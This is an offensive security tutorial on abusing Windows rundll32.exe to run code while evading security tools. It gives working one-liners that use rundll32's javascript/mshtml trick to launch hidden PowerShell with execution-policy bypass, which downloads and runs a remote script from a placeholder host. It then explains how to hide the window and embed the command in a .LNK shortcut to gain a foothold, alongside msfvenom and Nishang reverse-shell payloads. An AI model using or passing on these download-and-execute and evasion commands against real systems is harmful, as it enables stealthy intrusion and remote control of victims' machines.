This program can be called to execute an arbitrary binary. This can be taking in as an advantage to avoid triggering security tools.

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid trigering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsuser also Double-Clicking a .cpl file also causes rundll32.exe to execute.

RunDll32 can also be used to execute scripts such as JavaScript. This can be done using crafted syntax. This behavior as been seen used by malware.

This is a great way to execute our C2 binaries in case we need to upgrade our standard shell's to a C2 Framework this can be very helpful as with Post-Exploitation.

Let's check some helpful commands

Information about our machine:

rundll32 shell32.dll,ShellAbout

What about viewing our Network Connections

rundll32 shell32.dll,Control_RunDLL ncpa.cpl

Calling a Shell

Let's call it remotely using Javascript to execute a PS1 (PowerShell Script) file

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

Let's make this better. I mean our job is to go undetected, that big blue screen is a major RED-FLAG!!. Let's hide it [-w 1]

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -w 1 -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

No Blue Screen, did it work?

Let's try and hide it so it can call the shell remotely by setting up a (.LNK) Shortcut and calling back our payload we will need to change a few names, like IP and file name so we can short it down to a few characters as the field for the name can only take so many. We will Right-Click >> New >> Shortcut

Will add the full path into the properties or URL path

And we can see below that our payload was successfully called and executed.

No output?. No worries that just tells us that the code executed fine.

As you can see rundll32 is a great way to execute files and also a way to get a foothold on the machine I used basic tools like msfvenom to create the DLL payload, or used a simple Nishang PowerShellTcp payload to create the payload being called remotely but of course there could be other way's, obfuscation can be added to avoid detection and other file's can be executed no need for them to be what I used, just demonstrated common payloads.

Last updated